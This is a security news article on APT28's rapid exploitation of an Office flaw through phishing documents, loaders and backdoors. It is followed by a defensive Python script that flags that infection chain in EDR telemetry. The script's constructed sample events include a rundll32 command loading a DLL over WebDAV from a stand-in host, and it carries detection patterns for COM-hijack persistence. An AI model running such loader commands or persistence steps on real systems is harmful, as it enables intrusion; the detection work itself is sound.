Russian Hackers Pounce on Fresh Microsoft Office Flaw in Blitz Attack on Europe
APT28, the notorious Russian state-sponsored hacking group, is exploiting a brand-new Microsoft Office vulnerability just days after its disclosure, hitting military and government targets across Europe and beyond. In a lightning-fast operation dubbed Neusploit, they’re using phishing docs to sneak in backdoors and steal sensitive data from places like Ukraine, Poland, and Turkey.
Deep Dive into the Attack
The flaw is CVE-2026-21509, a security feature bypass in Microsoft Office with a CVSS score of 7.8. It is serious because a malicious RTF or Word file is enough to defeat Office's protections, with no macros needed. Trellix spotted APT28 weaponizing it within 24 hours of Microsoft's patch on January 26, 2026, while Zscaler traced attacks back to January 29 targeting Ukraine, Slovakia, and Romania.
Phishing lures masquerade as urgent docs on weapons smuggling or military drills, tricking users into opening them. Once opened, the documents trigger infection chains that drop loaders like PixyNetLoader or SimpleLoader, which in turn unpack payloads such as MiniDoor (an Outlook stealer), Covenant Grunt implants, or a custom C++ backdoor called BEARDSHELL. These use slick evasion tricks: COM hijacking for persistence, steganography in PNGs, DLL proxying, process injection, and legitimate cloud storage like filen.io for command-and-control so the traffic blends in with normal use.
Ukraine’s CERT-UA confirmed over 60 government emails hit, with docs created January 27 pulling down LNK files and DLLs via WebDAV. Trellix’s February 4 report nails maritime and transport orgs in Poland, Slovenia, Turkey, Greece, UAE, and Ukraine as prime targets.
Why Devs Need to Sweat This
If you're building or deploying Office-integrated apps, client-side tools, or anything touching enterprise email, this is a wake-up call: bugs like CVE-2026-21509 show how quickly nation-states turn a just-patched flaw into a 1-day exploit and a global operation overnight. Patch your Microsoft stack yesterday, enforce macro blocks, and scan for these loaders in EDR logs; one unpatched endpoint can spill creds or pave the way for lateral movement in your org.
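The chain the article describes (a document pulling LNK files and DLLs over WebDAV, a loader being launched, and COM hijacking for persistence) leaves traces an EDR already records. The script below is an added example, not code from Trellix, Zscaler, CERT-UA, or this article: it runs a handful of detection rules over constructed EDR-style events and reports which rule each event trips. The event schema, the process lists, the sample events, and the placeholder CLSID are assumptions made for the example; map the fields to whatever your EDR actually exports. Because the article notes the exploit needs no macros, macro blocking does not stop the initial trigger, which is why these rules look at what happens after the document opens.

```python
"""Rule-based triage of EDR events for the Office -> WebDAV -> loader -> COM-hijack
chain described in the article. Added example; event format and samples are constructed."""
import re
from dataclasses import dataclass

# Office processes that should not normally speak WebDAV or spawn DLL loaders.
OFFICE_PROCS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Windows binaries that can load a DLL or run a LNK fetched by a document
# (a deliberately small set chosen for this example, not a list from the report).
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe", "mshta.exe"}

# A LNK or DLL referenced by a WebDAV UNC path (\\host@80\share\x.dll, \\host@SSL\...)
# or by an http(s) URL on a command line.
REMOTE_LNK_DLL = re.compile(
    r"(\\\\[^\\\s]+@(?:\d+|ssl)\\|https?://)\S*\.(?:lnk|dll)\b", re.IGNORECASE)
# Per-user COM registration overrides the machine-wide entry, which is why
# COM hijacks land under HKCU\Software\Classes\CLSID\{...}\InprocServer32.
COM_INPROC = re.compile(
    r"^(?:HKCU|HKEY_CURRENT_USER)\\Software\\Classes\\CLSID\\\{[0-9a-f-]+\}\\InprocServer32",
    re.IGNORECASE)


@dataclass
class Event:
    """Minimal, constructed EDR event; real telemetry has many more fields."""
    kind: str          # "process", "network" or "registry"
    proc: str          # image name of the acting process
    parent: str = ""   # parent image name (process events)
    cmdline: str = ""  # command line (process events)
    dest: str = ""     # remote host:port (network) or registry key written (registry)
    method: str = ""   # HTTP verb (network events)


def rules(ev):
    """Yield (rule_id, description) for every rule the event matches."""
    proc, parent = ev.proc.lower(), ev.parent.lower()
    if ev.kind == "process" and parent in OFFICE_PROCS and proc in DLL_LOADERS:
        yield "office-spawns-dll-loader", f"{ev.parent} spawned {ev.proc}: {ev.cmdline}"
    if ev.kind == "process" and REMOTE_LNK_DLL.search(ev.cmdline):
        yield "remote-lnk-or-dll", f"{ev.proc} references a remote LNK/DLL: {ev.cmdline}"
    if ev.kind == "network" and proc in OFFICE_PROCS and ev.method.upper() in {"PROPFIND", "OPTIONS"}:
        yield "office-webdav", f"{ev.proc} issued WebDAV {ev.method} to {ev.dest}"
    if ev.kind == "registry" and COM_INPROC.search(ev.dest):
        yield "com-hijack-candidate", f"{ev.proc} wrote {ev.dest}"


def detect(events):
    """Return a list of (rule_id, description) findings in event order."""
    return [(rule_id, desc) for ev in events for rule_id, desc in rules(ev)]


# Constructed sample telemetry: one benign Office launch, the suspicious chain, one benign browser.
SAMPLE_EVENTS = [
    Event("process", "WINWORD.EXE", parent="OUTLOOK.EXE",
          cmdline=r'WINWORD.EXE /n "C:\Users\u\Downloads\brief.docx"'),
    Event("network", "WINWORD.EXE", dest="203.0.113.10:80", method="PROPFIND"),
    Event("process", "rundll32.exe", parent="WINWORD.EXE",
          cmdline=r"rundll32.exe \\203.0.113.10@80\share\update.dll,Start"),
    Event("registry", "rundll32.exe",
          dest=r"HKCU\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32"),
    Event("process", "chrome.exe", parent="explorer.exe", cmdline="chrome.exe --profile-directory=Default"),
]

if __name__ == "__main__":
    for rule_id, desc in detect(SAMPLE_EVENTS):
        print(f"[{rule_id}] {desc}")
```

Each rule on its own is noisy in some environments (installers do write per-user CLSID keys, and some document management products use WebDAV legitimately), so the value is in correlation: the same Office process issuing PROPFIND, then spawning a loader that names a remote DLL, then that loader touching an InprocServer32 key is a sequence worth an analyst's time regardless of which malware family is behind it.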
Final Take
APT28’s speed and sophistication scream urgency: update Office, train your team on phishing red flags, and layer defenses. In 2026’s cyber battlefield, hesitation hands hackers the keys—stay vigilant or become the next vector.